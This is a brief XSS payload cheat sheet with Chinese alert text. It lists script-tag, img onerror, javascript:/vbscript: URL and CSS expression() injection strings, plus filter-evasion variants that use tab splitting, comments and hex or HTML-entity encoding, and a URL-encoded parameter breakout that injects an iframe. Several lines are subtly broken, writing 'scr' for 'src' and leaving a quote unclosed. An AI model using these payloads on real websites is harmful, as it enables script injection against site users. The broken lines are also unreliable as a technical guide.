<script>alert("跨站")</script> (most commonly used)
<img scr=javascript:alert("跨站")></img>
<img scr="javascript: alert(/跨站/)></img>
<img scr="javas????cript:alert(/跨站/)" width=150></img> (whitespace produced with the Tab key)
<img scr="#" onerror=alert(/跨站/)></img>
<img scr="#" style="xss:expression(alert(/xss/));"></img>
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ denotes a comment)
<img src=vbscript:msgbox ("xss")></img>
<style> input {left:expression (alert('xss'))}</style>
<div style={left:expression (alert('xss'))}></div>
<div style={left:exp/* */ression (alert('xss'))}></div>
<div style={left:\0065\0078ression (alert('xss'))}></div>
HTML entity: <div style={left:&#x0065;xpression (alert('xss'))}></div>
Unicode: <div style="{left:expRessioN (alert('xss'))}">
"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["